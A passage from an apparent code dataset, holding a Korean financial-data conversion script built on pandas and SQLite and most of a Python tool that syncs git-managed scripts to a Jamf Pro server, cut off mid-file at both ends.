(Callable[[str], bool]) check if given path is output code file.\n\tcodefilepath_filter_callable: (Callable[[str], bool]) check if given path is input or output code file.\n\tenumelement_discover_callable: (Callable[[Iterator[str], str], Iterator[EnumElement]]) fetch out enum element from given code content.\n\tenumelement_assign_callable: (Callable[[List[EnumElement]], None]) assign code value to enum element pairs.\n\tcodemap_write_callable: (Callable[[List[EnumElement]], None]) generate code-map code files.\n\"\"\"\n","sub_path":"enumnamecrawler/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"404159122","text":"#19년 5월 22일 현재 kisvalue 단일재무제표 EVAL용 Raw 데이터로 변환하는 프로그램.\n#카타고리 정의를 대폭 수정함.\n#\n\nimport requests\nimport pandas as pd\nfrom pandas import Series, DataFrame\n#import json\nimport sqlite3\nfrom pandas import ExcelWriter\nimport time\n\n#받아올 데이터 베이스 지정 및 DB의 종목 리스트 작성 / 리스트 : PL -=-> 메인실행으로 옮김\n\ndef DBlist(fileloc):\n con = sqlite3.connect(fileloc)\n cursor = con.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n Plist = cursor.fetchall()\n PL = []\n for i in range(0, len(Plist)): # DB안의 회사 이름을 PL에 저장/list format\n j = Plist[i][0]\n PL.append(j)\n return (PL)\n\n# 받아올 데이터 트리밍 작업\ndef import_com(com_code, fileloc):\n con = sqlite3.connect(fileloc)\n #df = pd.read_sql(\"SELECT * FROM '%s'\" % com_code, con, index_col='ACCODE')\n df = pd.read_sql(\"SELECT * FROM '%s'\" % com_code, con)\n return df\n\n\n# 받아올 데이터 포맷 정리 루틴\ndef moddata(row_code): # 라인별 임포트 모듈\n # temp=df.ix[row_code]\n temp = df.loc[row_code, '2014':'2018']\n temp_a = pd.to_numeric(temp, errors='coerce')\n temp_b = temp_a.fillna(0)\n temp_b = temp_b.div(1000) # 원단위를 천원단위로 변환 (달러로 변환)\n return temp_b\n\ndef create_Eval_table_op(data):\n# 항목매칭작업 - kisvalue에 단독제무제표로 올라온 모든 데이터를 받은 파일을 변환\n #손익계산서\n\n sales = moddata(3) # 매출액\n COGS = moddata(4) # 매출원가\n COGS = COGS.mul(-1) #비용은 음수\n SGATotal = moddata(5) # 한국재무제표상 전체 판매비와관리비\n Dep = moddata(7) # 감가상각비\n Amo = moddata(6) # 무형자산상각비\n DeAm = Dep + Amo # 감가상각비+무형자산상각비\n DeAm = DeAm.mul(-1)\n RD1 = moddata(8) #연구비\n RD2 = moddata(9) #경상연구개발비\n RD3 = moddata(10) #경상개발비\n RDExpense = RD1 + RD2 + RD3 # 연구비 총계\n RDExpense = RDExpense.mul(-1) # 비용은 음수\n SGA = SGATotal + RDExpense + DeAm # 데이터 테이블상 SGA는 연구개발비, 감가상각과 분리\n SGA = SGA.mul(-1) # 비용은 음수\n Interest_Exp = moddata(13) # 금융비용\n Interest_Exp = Interest_Exp.mul(-1)\n #Interest_Income = moddata(14)+moddata(15)\n #Net_Int = Interest_Income + Interest_Exp #이자수익 - 이자비용\n #Min_int_E = moddata(17) # 소수주주지분순이익\n #Min_int_L = moddata(16) #소수주주지분순손실\n #Min_int_L = Min_int_L.mul(-1)\n Min_Int_Earning = 0\n #Nonopincome = moddata(11) # 영업외수익\n #Nonoploss = moddata(12) - Interest_Exp # 영업외비용에서 이자비용을 다시 빼줌\n #Nonoploss = Nonoploss.mul(-1) # 비용은 음수\n Temp_EBT = moddata(17) #영업이익(손실)/125000\n Temp_EBIT = moddata(19) # 법인세비용차감전 계속사업이익\n Diff_I = Temp_EBIT - Temp_EBT\n Nonopincomes = Diff_I +Interest_Exp\n #Nonopincomes = Nonopincome + Nonoploss\n IncomeTax = moddata(18) # 법인세비용\n IncomeTax = IncomeTax.mul(-1) # 비용은 음수\n Otherincome = 0 # 지분법회사 이익-손실\n ExtItems = moddata(16) # 중단사업이익\n #재무제표\n CurrAcc = moddata (20) # 당좌자산\n OpCash = moddata(21) # 현금및현금성자산\n Market_Sec1 = moddata(22) # 단기금융상품\n Market_Sec2 = moddata(23) #단기투자증권\n Opc_Msec = OpCash + Market_Sec1 + Market_Sec2 # 현금및현금성자산\n Receivables = moddata(24) # 매출채권\n Inventories = moddata(25) # 재고자산\n OCA = CurrAcc - Opc_Msec - Receivables # 기타유동자산 = 당좌자산 - 현금성자산-매출채권\n PPE = moddata(28) # 유형자산\n Investment = moddata(27) # 투자자산\n Intangible = moddata(29) # 무형자산\n OA1 = moddata(30) # 기타비유동자산\n OA2 = moddata(31) # 이연자산\n #OA3 = moddata(32) # 기타금융업자산\n #OA4 = moddata(33) #연결조정차\n Otherassets = OA1+OA2\n #채무\n Acc_payable = moddata(43) # 매입채무\n IncomeTax_payable = moddata(33) # 이연법인세부채(유동부채아래)\n CurrLiab = moddata(32) # 유동부채\n OthCurrLiab = moddata(44) #기타유동부채\n CurrentDebt = CurrLiab - Acc_payable - IncomeTax_payable - OthCurrLiab # 유동부채\n noncurrentliab = moddata(34) # 비유동부채(계)\n DefTax = moddata(35) # 이연법인세부채(비유동부채아래)\n OthLiab = moddata(45) + moddata(36) # 기타비유동부채+이연부채\n longtermdebt = noncurrentliab - DefTax - OthLiab\n Minority_interest = 0 # 외부주주지분\n Pref_stock = moddata(38) # 우선주자본금\n Paidincommcap = moddata(37) # 보통주자본금\n N_CommStock = moddata(47) #보통주발행주식수\n PreferredDiv = moddata(50) * (Pref_stock/(Pref_stock + Paidincommcap) ) #우선주배당 - 자본잉여금 유출 기타.\n PreferredDiv = PreferredDiv.mul(-1)\n retainedequity = moddata(39) #자본잉여금\n othercapital = moddata(41) #자본조정\n otherretained = moddata(42) #기타포괄손익누계액\n retainedprofit = moddata(40) #이익잉여금\n Retained_earnings = retainedequity+othercapital+otherretained+retainedprofit\n Common_div = moddata(50) + PreferredDiv # 배당금의지급\n Common_div = Common_div.mul(-1)\n N_employee = moddata(49).mul(1000)\n\n\n temp = {'01 Sales': sales,\n '02 COGS': COGS,\n '03 RDExpense': RDExpense,\n '04 SGA': SGA,\n '05 Depreciation and Amortization': DeAm,\n '06 Interest_Expenses': Interest_Exp,\n '07 Non operational income': Nonopincomes, # 영업외수익\n '08 Income Tax': IncomeTax, # 법인세비용\n '09 Minority Interest in Earning' :Min_Int_Earning, # 지분법상 이익\n '10 Other Income(Loss)' : Otherincome, # 기타수익\n '11 Extra Items or discontinued business income': ExtItems, # 특별기타항목-통상적이지 않은 이익이나 매각 등 - 중단사업이익\n '12 Preferred Dividend': PreferredDiv, #자본잉여금 감소의 기타부분\n '13 Operating Cash and Marketable Securiteis': Opc_Msec, # 현금및현금성자산\n '14 Receivables': Receivables, # 매출채권\n '15 Inventories': Inventories, # 재고자산\n '16 Other Current Assets': OCA, # 기타유동자산\n '17 PP&E': PPE, # 설비자산\n '18 Investments': Investment, # 투자자산\n '19 Intangibles': Intangible, # 무형자산\n '20 Other Assets': Otherassets, # 기타비유동자산\n '21 Current Debt': CurrentDebt, # 유동부채\n '22 Account Payable': Acc_payable, # 매입채무\n '23 Income Tax Payable': IncomeTax_payable, # 이연법인세부채\n '24 Other Current Liabilities': OthCurrLiab, # 기타유동부채\n '25 Long term debt': longtermdebt,\n '26 Other Liabilities': OthLiab,\n '27 Deferred Tax': DefTax, # 이연법인세부채\n '28 Minority Interests': Minority_interest, # 외부주주지분\n '29 Preferred Stock': Pref_stock, # 우선주자본금 eval p188\n '30 Paid in Common Capital': Paidincommcap, # 보통주자본금\n '31 Retained Earnings': Retained_earnings, # 이익잉여금\n '32 Common Dividends': Common_div, # 배당금의지급\n '33 Number of Common Stocks': N_CommStock, # 보통주수\n '34 Number of Employees': N_employee,\n '35 Depreciation': Dep\n }\n\n df = pd.DataFrame(temp) #dataframe으로 모으고\n df1 = df.transpose() #축 변경\n\n #YR = ['2012/12', '2013/12', '2014/12', '2015/12', '2016/12', '2017/12(E)']\n #df2 = df1.rename(columns={'DATA1': YR[0], 'DATA2': YR[1], 'DATA3': YR[2], 'DATA4':\n # YR[3], 'DATA5': YR[4], 'DATA6': YR[5]}) # 인덱스 변경\n\n return df1\n\ndef ticker_finder(ticker):\n df = pd.read_excel('C:/a/koreantickers.xlsx',index_col = 'tick')\n a = df['name'][ticker]\n return a\n\ndef save_xls(list_dfs, xls_path, codes):\n writer = pd.ExcelWriter(xls_path, engine='xlsxwriter')\n for n, m in enumerate(list_dfs):\n list_dfs[m].to_excel(writer, codes[m])\n writer.save()\n\nif __name__ == \"__main__\":\n\n #removeddb = []\n\n PPL = DBlist('C:/a/ext1905byKISticker.db') # 리스트 호출~ 갱신시 여기 바꿔주고\n temp_df = {}\n\n conn = sqlite3.connect(\"c:/a/evalrawkissIP1905.db\") # 새로운 db생성 - 갱신시 여기 바꿔주고\n\n for k, l in enumerate(PPL):\n try :\n df = import_com(l,'C:/a/ext1905byKISticker.db') # 데이터 처리하여 DF로 리턴 - 갱신시 여기 바꿔주고\n #code = df['2018'][1]\n #sales2017 = df['2017'][3]\n #print(df,code,sales2017)\n #if code is None : #and sales2017 is not None: #비상장주 처리시 쓰는 루틴\n #if sales2017 and code is not None: #상장주 처리시 쓰는 루틴\n df1 = create_Eval_table_op(df) #df1 에 처리된 데이터 저장\n company_name = df.loc[2,'2018']\n CS = df1.ix['33 Number of Common Stocks'] # 보통주수는 따로 빼서 단위 보존, 천주단위\n EMP = df1.ix['34 Number of Employees']\n DEP = df1.ix['35 Depreciation']\n df1 = df1[:-3].div(1000) # 천원단위를 백만원 단위로 변환(천불), 보통주수는 제외\n df1 = df1.round(2)\n CS = CS.div(1)\n DEP = DEP.div(1000)\n df1 = df1.append(CS)\n df1 = df1.append(EMP)\n df1 = df1.append(DEP)\n namemix = company_name + ' ' + l\n print(namemix,k)\n df1.to_sql(namemix, conn, if_exists='replace')\n #temp_df[k] = df1 #엑셀에 넣기위해 데이터 변환작업\n #else:\n # pass\n except:\n pass\n #save_xls(temp_df, 'C:\\\\a\\\\EvalRawfromKISSIP_1808.xlsx', PPL) # 새로운 엑셀파일 생성\n\n","sub_path":"KISALLIndnon_pubRAWDBtoRAWEVAL_1905.py","file_name":"KISALLIndnon_pubRAWDBtoRAWEVAL_1905.py","file_ext":"py","file_size_in_byte":10234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"61903980","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"git2jss: sync your git repository with your JSS\n\nA fast asynchronous python library for syncing your scripts in git with your\nJSS easily. This allows admins to keep their script in a version control system\nfor easy updating rather than googling and copy-pasting from resources that\nthey find online.\n\nExample:\n To sync the most recent commits to your JSS:\n\n % python3 sync.py --url https://company.jamfcloud.com \\\n --username git2jss-api-user\n\nUsage:\n Required flags:\n --url url for the JSS (https://company.jamfcloud.com)\n --username username in JSS with API privileges\n Optional flags:\n --password for CI/CD (Will prompt for password if not set)\n --do_not_verify_ssl skip ssl verification\n --overwrite overwrite all scripts and extension attributes\n --limit limit max connections (default=25)\n --timeout limit max connections (default=60)\n --retries retry n times after timeout (default=3)\n --verbose add additional logging output\n --update_all upload all resources in ./extension_attributes\n and ./scripts\n --jenkins to write a Jenkins file:jenkins.properties with\n $scripts and $eas and compare\n $GIT_PREVIOUS_COMMIT with $GIT_COMMIT\n\nAttributes:\n ARGS (argparse.Namespace): contains all of the arguments passed to\n ``sync.py`` from the command line. See ``get_args`` documentation.\n SLACK_EMOJI (str): The Jenkins file will contain a list of changes scripts\n and eas in $scripts and $eas. Use this variable to add a Slack emoji\n in front of each item if you use a post-build action for a Slack custom\n message\n SUPPORTED_EXTENSIONS (tuple): Tuple of (str) objects defining supported\n file extensions for scripts and eas.\n CATEGORIES (list): Empty list that will be filled by connecting to the JSS\n and downloading the existing categories.\n FILE_PATH (pathlib.Path): Path to the folder containing sync.py at\n execution. This is defined by the ``__file__`` attribute's ``.parent``\n S_HEAD (dict): Dictionary containing the headers used by ``aiohttp`` when\n making requests to the JSS.\n S_AUTH (None): Default ``None``, but populated with ``aiohttp.BasicAuth``\n at runtime with the ``ARGS.username`` and password provided by either\n ``ARGS.password`` or ``getpass.getpass`` at execution.\n JPS_URL (None): Default ``None``, but populated with ARGS.url.\n TIME_OUT (None): Default ``None``, but populated with ARGS.timeout.\n RE_TRIES (int): Default ``3``, but populated with ARGS.retries.\n\nTodo:\n * Make ``JamfObject`` a Factory to automate object creation.\n\n\"\"\"\n# pylint: disable=missing-docstring,invalid-name\nimport argparse\nimport asyncio\nimport getpass\nimport logging\nimport os\nimport pathlib\nimport subprocess\nimport sys\nimport urllib.parse as urlparse\nimport warnings\nimport xml.etree.ElementTree as ET\nfrom xml.dom import minidom\n\nimport aiohttp\nimport async_timeout\nimport uvloop\n\n# Logging configuration\nlogging.basicConfig(\n level=logging.DEBUG,\n format=\"%(levelname)7s: %(message)s\",\n stream=sys.stderr,\n)\nLOG = logging.getLogger(\"\")\nLOG.setLevel(logging.INFO)\n\n# Global Constants\nSLACK_EMOJI = \":white_check_mark:\"\nSUPPORTED_EXTENSIONS = (\".sh\", \".py\", \".pl\", \".swift\", \".rb\")\nCATEGORIES = []\nFILE_PATH = pathlib.Path(__file__).parent\nS_HEAD = {\"Accept\": \"application/xml\",\n \"Content-Type\": \"application/xml\"}\nS_AUTH = None\nJPS_URL = None\nTIME_OUT = None\nRE_TRIES = 3\n\n\nclass JamfObject(object):\n \"\"\"Base Class for all Jamf Object types (scripts, eas, etc.)\n\n Most actual functionality should be abstracted in this class, with any\n object requiring specific functionality having it added to their class.\n\n Attributes:\n folder (str): Name of the folder containing the script and XML files\n xml_file (pathlib.Path): XML file defined by the subclass's\n ``filename`` class attribute\n new_url (str): url for creating a new object in the JSS defined by\n parsing a new url using ``urllib.parse.urljoin`` to join the\n ``JPS_URL`` global with the subclass's ``resource`` class atribute.\n name (str): If the XML file contains the ```` tag, then this name\n is used when GET or PUT are performed in the JSS. Otherwise,\n ``folder.name`` is used as a fallback.\n xml (xml.etree.ElementTree.Element): Element object containing the\n contents of the XML file if available, otherwise the ``get`` method\n will attempt to download the existing XML from the JSS. If neither\n are available, the template stored in ``templates/`` is used with\n the file defined by the subclass' ``filename`` class attribute.\n data (str): String containing the contents of the script file to be\n embedded in ``xml`` prior to the PUT stage. Populated by\n ``get_data`` when the ``get`` method is called. The script file\n is discovered by globbing ``folder`` and looking for files with a\n ``pathlib.Path.suffix`` defined in ``SUPPORTED_EXTENSIONS``.\n\n \"\"\"\n def __init__(self, folder, *args, **kwargs):\n \"\"\"Initialization of a JamfObject object\n\n Nothing much happens at initialization. No IO is used in order to not\n slow down the script, and because the ``get`` method requires an\n ``aiohttp`` session and ``asyncio`` semaphore so that any missing XML\n may be gathered from the JSS.\n\n Args:\n folder (str): Name of the folder containing the script and xml for\n each subclass object.\n\n \"\"\"\n self.folder = FILE_PATH.joinpath(self.source, folder)\n self.xml_file = self.folder.joinpath(self.filename + \".xml\")\n self.new_url = urlparse.urljoin(\n JPS_URL, f\"/JSSResource/{self.resource}/id/0\")\n self.name = None\n self.xml = None\n self.data = None\n\n def __str__(self):\n return f\"{self.folder}\"\n\n def resource_url(self):\n \"\"\"Returns the URL for each extant object in the JSS\n\n Args:\n None\n\n Returns:\n None: if ``name`` is not defined\n str: returns a str parsed by ``urllib.parse.urljoin`` combining\n the ``JPS_URL`` global and the subclass' ``resource`` class\n attribute, and the discovered ``name`` attribute.\n\n \"\"\"\n if not self.name:\n return None\n return urlparse.urljoin(\n JPS_URL, f\"/JSSResource/{self.resource}/name/{self.name}\")\n\n async def get(self, session, semaphore):\n \"\"\"Gets the information needed to upload an object to the JSS either\n from the XML in the folder, the JSS, or from the template as needed.\n\n Args:\n session (aiohttp.ClientSession): an active session to eventually\n pass to the ``get_resource`` function if needed.\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n\n Returns:\n xml (xml.etree.ElementTree.Element): Though not strictly necessary\n for the execution of the script, the ``xml`` attribute is\n returned for testing purposes.\n\n \"\"\"\n if not self.xml:\n if not self.xml_file.exists():\n self.xml = await self.get_xml(session, semaphore)\n else:\n LOG.debug(\"Reading in XML file: %s\", self.xml_file)\n self.xml = await parse_xml(self.xml_file)\n # Make sure we have the actual name from the XML\n # rather than using the folder name.\n self.name = self.xml.find(\"name\").text\n await self.cleanup_xml()\n LOG.debug(\"XML Contents: %s\", make_pretty_xml(self.xml))\n if not self.data:\n if not await self.get_data():\n LOG.error(\"No script file found in %s\", self.folder)\n return # Need to skip if no script.\n return self.xml\n\n async def put(self, session, semaphore):\n \"\"\"PUTs the information gathered by the ``get`` method into the JSS.\n\n Args:\n session (aiohttp.ClientSession): an active session to eventually\n pass to the ``get_resource`` function if needed.\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n\n Returns:\n bool: True if the PUT succeeds, False if it does not.\n\n \"\"\"\n put_response = None\n for attempt in range(1, RE_TRIES):\n try:\n put_response = await put_resource(\n self.xml, self.resource_url(),\n self.new_url, session, semaphore)\n break\n except asyncio.exceptions.TimeoutError:\n LOG.error(\"%s: Upload timed out. This is attempt %d of %d\",\n self.name, attempt, RE_TRIES)\n if put_response in (201, 200):\n LOG.info(\"Uploaded %s: %s\", self.class_name, self.name)\n return True\n LOG.error(\"Uploading %s %s Failed!\", self.class_name, self.name)\n return False\n\n async def get_xml(self, session, semaphore):\n \"\"\"Called by the ``get`` method if the XML file is missing from\n ``folder``. Here is where the ``name`` is inferred from\n ``pathlib.Path.name``. This is not an ideal scenario, so warnings are\n issued. Then an attempt is made to GET from the JSS. If this fails,\n the XML template file defined in the subclass is used instead.\n\n Args:\n session (aiohttp.ClientSession): an active session to eventually\n pass to the ``get_resource`` function if needed.\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n\n Returns:\n _template (xml.etree.ElementTree.Element): returns either the\n GET results from the JSS or the template file contents.\n\n \"\"\"\n LOG.warning(\"%s: Inferring name from folder.\", self.folder.name)\n self.name = self.folder.name\n LOG.warning(\"%s: XML Missing. Attempting GET from JSS.\", self.name)\n # Get XML object from the JPS\n _template = await get_resource(self.resource_url(), session, semaphore)\n if not _template:\n LOG.error(\"%s: GET Failed! Using template: %s\",\n self.name, self.template)\n _template = await parse_xml(self.template)\n return _template\n\n async def _cleanup_xml(self):\n \"\"\"All of the common XML cleanup activities should be performed here\n to reduce the amount of duplicated code where possible. Any special\n actions should be taken in each subclass' ``cleanup_xml`` method.\n\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n # If name is missing or blank, then set it to the folder name, but\n # issue a warning because this should not be considered good practice.\n _name = self.xml.find(\"name\")\n if _name is None:\n LOG.warning(\"%s: Name is missing from XML. Setting to '%s'. \"\n \"Update XML file: '%s' to stop seeing this message.\",\n self.folder.name, self.folder.name, str(self.xml_file))\n ET.SubElement(self.xml, \"name\").text = self.folder.name\n elif not _name.text:\n LOG.warning(\"%s: Name is blank in the XML. Setting to '%s'. \"\n \"Update XML file: '%s' to stop seeing this message.\",\n self.folder.name, folder.name, str(self.xml_file))\n self.xml.find(\"name\").text = self.folder.name\n if self.xml.find(self.data_xpath) is not None:\n self.xml.find(self.data_xpath).clear()\n if self.xml.find(\"id\") is not None:\n self.xml.remove(self.xml.find(\"id\"))\n if self.xml.find(\"filename\") is not None:\n self.xml.remove(self.xml.find(\"filename\"))\n\n async def _check_category(self):\n \"\"\"Special method only for objects that use categories. Should be\n called by that object's ``cleanup_xml`` method.\n\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n # Check the category\n _category = self.xml.find(\"category\")\n if _category is None:\n LOG.warning(\n \"%s: Category is missing from XML. Setting to None. \"\n \"Update XML file: '%s' to stop seeing this message.\",\n self.name, str(self.xml_file))\n ET.SubElement(self.xml, \"category\").text = \"None\"\n elif _category.text != \"None\" and _category.text not in CATEGORIES:\n LOG.warning(\n \"%s: Category '%s' not in the JSS. Setting to None. \"\n \"Update XML file: '%s' to stop seeing this message.\",\n self.name, _category.text, str(self.xml_file))\n _category.text = \"None\"\n\n\n async def get_data(self):\n \"\"\"Globs the ``folder`` looking for files with extensions defined in\n the ``SUPPORTED_EXTENSIONS`` global. If more than one file is found,\n the first is used.\n\n Once a file is found, its contents are read and placed into ``data``\n and the ``xml`` is updated to include the script contents using the\n subclass' ``data_xpath`` class attribute.\n\n Args:\n None\n\n Returns:\n None: if a script file cannot be found, then return None\n _data_file (pathlib.Path): Path to data file, used for testing\n purposes.\n\n \"\"\"\n # If name is missing or blank, then set it to the folder name, but\n # issue a warning because this should not be considered good practice.\n try:\n # Get all the script files within the folder, we'll only use\n # script_file[0] in case there are multiple files\n self._data_file = [f for f in self.folder.glob(\"*\")\n if f.suffix in SUPPORTED_EXTENSIONS][0]\n # Read the file and assign the contents to self.data\n with open(self._data_file, \"r\") as f:\n self.data = f.read()\n # Write data to the appropriate element within the XML.\n self.xml.find(self.data_xpath).text = self.data\n except IndexError:\n return None\n return self._data_file\n\n\nclass ExtensionAttribute(JamfObject):\n \"\"\"Subclass of ``JamfObject`` that defines attributes and methods for\n Extension Attributes.\n\n Attributes:\n class_name (str): String used for pretty printing the name\n source (str): String used for building the pathlib.Path ``folder``\n attribute in JamfObject\n filename (str): String used for building multiple pathlib.Path objects\n to files such as the XML file and script file.\n resource (str): Used by JamfObject after \"JSSResource\" to define the\n ``new_url`` attribute and the ``resource_url`` method to build\n the URL for the object in the JSS.\n data_xpath (str): Used by JamfObject to define where to write the\n ``data`` attribute (script) string to the XML prior to PUT.\n template (pathlib.Path): Path to the template in case the XML file is\n missing or the object does not yet exist in the JSS.\n\n \"\"\"\n class_name = \"Extension Attribute\"\n source = \"extension_attributes\"\n filename = \"ea\"\n resource = \"computerextensionattributes\"\n data_xpath = \"input_type/script\"\n template = FILE_PATH.joinpath(\"templates/ea.xml\")\n\n def __init__(self, folder, *args, **kwargs):\n \"\"\"Initialization of an ``ExtensionAttribute`` object\n\n Simply calls the superclass' (JamfObject) ``__init__`` method as most\n functionality is abstracted there.\n\n Args:\n folder (str): Name of the folder containing the script and xml for\n the ``ExtensionAttribute`` object.\n\n \"\"\"\n super().__init__(folder, *args, **kwargs)\n\n def __repr__(self):\n return f\"\"\n\n async def cleanup_xml(self):\n \"\"\"Called after ``xml`` is gathered in ``JamfObject`` in order to\n ensure the uploaded XML is clean of any superfluous tags.\n\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n # Call JamfObject._cleanup_xml to reduce repeated code.\n await self._cleanup_xml()\n\n\nclass Script(JamfObject):\n \"\"\"Subclass of ``JamfObject`` that defines attributes and methods for\n Scripts.\n\n Attributes:\n Attributes are identical in function to those in ``ExtensionAttribute``\n\n \"\"\"\n class_name = \"Script\"\n source = \"scripts\"\n filename = \"script\"\n resource = \"scripts\"\n data_xpath = \"script_contents\"\n template = FILE_PATH.joinpath(\"templates/script.xml\")\n\n def __init__(self, folder, *args, **kwargs):\n \"\"\"Initialization of a ``Script`` object\n\n Simply calls the superclass' (JamfObject) ``__init__`` method as most\n functionality is abstracted there.\n\n Args:\n folder (str): Name of the folder containing the script and xml for\n the ``Script`` object.\n\n \"\"\"\n super().__init__(folder, *args, **kwargs)\n\n def __repr__(self):\n return f\"\"\n\n async def cleanup_xml(self):\n \"\"\"Called after ``xml`` is gathered in ``JamfObject`` in order to\n ensure the uploaded XML is clean of any superfluous tags.\n\n Args:\n None\n\n Returns:\n None\n\n \"\"\"\n # Call JamfObject._cleanup_xml to reduce repeated code.\n await self._cleanup_xml()\n await self._check_category()\n # This tag is unique to Scripts so is only included here.\n if self.xml.find(\"script_contents_encoded\") is not None:\n self.xml.remove(self.xml.find(\"script_contents_encoded\"))\n\n\nasync def get_resource(url, session, semaphore, responses=(200,)):\n \"\"\"GET using the ``asyncio.ClientSession`` and return the XML.\n\n Significantly reduces the amount of repeated code by making all GET calls\n come through one function, irrespective of need. Returns the results as\n an ``xml.etree.ElementTree.Element`` object for further processing.\n\n Args:\n url (str): Full url of the requested resource in the JSS\n session (aiohttp.ClientSession): an active session object\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n responses (tuple): Acceptable HTTP status codes from the session.\n\n Returns:\n None: If response.status contains an HTTP status code not listed in\n ``responses``, then None is returned.\n xml.etree.ElementTree.Element: Otherwise a Element object is returned\n for further processing.\n\n \"\"\"\n get_results = None\n async with semaphore:\n with async_timeout.timeout(TIME_OUT):\n async with session.get(url, auth=S_AUTH, headers=S_HEAD) as resp:\n _text = await resp.text()\n LOG.debug(\n \"Response from URL: %s Status: %s Text: %s\",\n url, resp.status, _text)\n if resp.status in responses:\n get_results = ET.fromstring(_text)\n LOG.debug(\"URL: %s GET Results: %s\", url, get_results)\n return get_results\n\n\nasync def put_resource(xml_element, url, new_url, session, semaphore):\n \"\"\"PUT using the ``asyncio.ClientSession`` and return success.\n\n Significantly reduces the amount of repeated code by making all PUT calls\n come through one function, irrespective of need. Returns the HTTP response\n status code for further processing.\n\n Args:\n xml_element (xml.etree.ElementTree.Element): XML object to PUT\n in the JSS.\n url (str): Full URL of the resource in the JSS\n new_url (str): URL for creating a new object if it does not already\n exist in the JSS.\n session (aiohttp.ClientSession): an active session object\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n\n Returns:\n response.status (int): Returns the response status (200, 409, etc.)\n\n \"\"\"\n async with semaphore:\n with async_timeout.timeout(TIME_OUT):\n async with session.get(url, auth=S_AUTH, headers=S_HEAD) as resp:\n LOG.debug(\"URL: %s Initial PUT status: %s\", url, resp.status)\n if resp.status == 200:\n resp = await session.put(\n url,\n auth=S_AUTH,\n data=ET.tostring(xml_element),\n headers=S_HEAD)\n else:\n resp = await session.post(\n new_url,\n auth=S_AUTH,\n data=ET.tostring(xml_element),\n headers=S_HEAD)\n LOG.debug(\"URL: %s Final PUT status: %s\", url, resp.status)\n return resp.status\n\n\nasync def parse_xml(_path):\n \"\"\"Parses an XML file and returns the root object.\n\n Args:\n _path (pathlib.Path): Path to the XML file to be parsed.\n\n Returns:\n xml.etree.ElementTree.Element: root object of the XML file\n\n \"\"\"\n # To remove the visual abstraction of ``getroot`` this is moved here.\n return ET.parse(_path).getroot()\n\n\ndef make_pretty_xml(element):\n \"\"\"Parses an ``xml.etree.ElementTree.Element`` object and returns a string\n formatted for pretty-printing.\n\n Args:\n element (xml.etree.ElementTree.Element): XML object to convert.\n\n Returns:\n str: A string containing the XML\n\n \"\"\"\n return \"\\n\".join([md_l for md_l in minidom.parseString(\n ET.tostring(element, encoding=\"unicode\", method=\"xml\")\n ).toprettyxml(indent=\" \").splitlines() if md_l.strip()])\n\n\nasync def get_existing_categories(session, semaphore):\n \"\"\"GET the Categories from the JSS and return as a list.\n\n Args:\n session (aiohttp.ClientSession): an active session object\n semaphore (asyncio.BoundedSempahore): a Semaphore to prevent the\n script from establishing too many connections to the JSS.\n\n Returns:\n list: A ``list`` of ``str``s containing the names of the Categories\n in the JSS. If there are none, an empty list is returned.\n\n \"\"\"\n categories = await get_resource(\n urlparse.urljoin(JPS_URL, \"/JSSResource/categories\"),\n session, semaphore,\n responses=(200, 201))\n if categories:\n return [c.find(\"name\").text for c in [\n e for e in categories.findall(\"category\")]]\n return []\n\n\ndef check_for_changes():\n \"\"\"Looks for files that were changed between the current commit and\n the last commit so we don't upload everything on every run\n\n If ``ARGS.jenkins`` is ``True``, then utilize the ``GIT_PREVIOUS_COMMIT``\n and ``GIT_COMMIT`` environment variables to discover the changes.\n\n Args:\n None\n\n Returns:\n tuple:\n ch_extattrs (list): ``list`` of ``str``s containing the names of\n the changed Extension Attributes.\n ch_scripts (list): ``list`` of ``str``s containing the names of\n the changed Scripts.\n\n \"\"\"\n git_cmd = [\"git\", \"--no-pager\", \"diff\", \"--name-only\"]\n # This line will work with the environmental variables in Jenkins\n if ARGS.jenkins:\n ch_cmd = git_cmd + [ev for ev in [\n os.environ.get(\"GIT_PREVIOUS_COMMIT\"),\n os.environ.get(\"GIT_COMMIT\")]\n if ev]\n # Compare the last two commits to determine the list of files that\n # were changed\n else:\n l_cmd = [\"git\", \"log\", \"-2\", \"--pretty=oneline\",\n \"--pretty=format:%h\"]\n git_commits = subprocess.check_output(l_cmd).splitlines()\n ch_cmd = git_cmd + [git_commits[1], git_commits[0]]\n git_changes = str(subprocess.check_output(ch_cmd)).splitlines()\n ch_extattrs, ch_scripts = [], []\n for ch in git_changes:\n ch_path = pathlib.Path(ch).parts\n try:\n is_extension_attribute = all((\n \"extension_attributes\" in ch_path,\n ch_path[1] not in ch_extattrs))\n is_script = all((\n \"scripts\" in ch_path,\n ch_path[1] not in ch_scripts))\n except IndexError:\n continue\n if is_extension_attribute:\n ch_extattrs.append(ch_path[1])\n elif is_script:\n ch_scripts.append(ch_path[1])\n return ch_extattrs, ch_scripts\n\n\ndef jenkins_format(ch_type, ch_list):\n \"\"\"Returns a ``list`` of ``str``s used by ``write_jenkins_file`` to create\n the ``str`` to write to the Jenkins file.\n\n Nested function ``j_fmt``:\n Args:\n ch_item (str): Name of changed item\n\n Returns:\n str: ``ch_item`` added to Jenkins style ``str``\n\n Args:\n ch_type (str): The type of changed object (i.e. \"eas\", \"scripts\")\n ch_list (list): ``list`` of ``str``s containing the name of each\n changed object.\n\n Returns:\n list: items formatted by ``j_fmt`` for writing to the Jenkins File.\n\n \"\"\"\n def j_fmt(ch_item):\n return f\"{SLACK_EMOJI} {ch_item}\\\\n\\\\\"\n return ([f\"{ch_type}={j_fmt(ch_list[0])}\"] +\n [j_fmt(ji) for ji in ch_list[1:]])\n\n\ndef 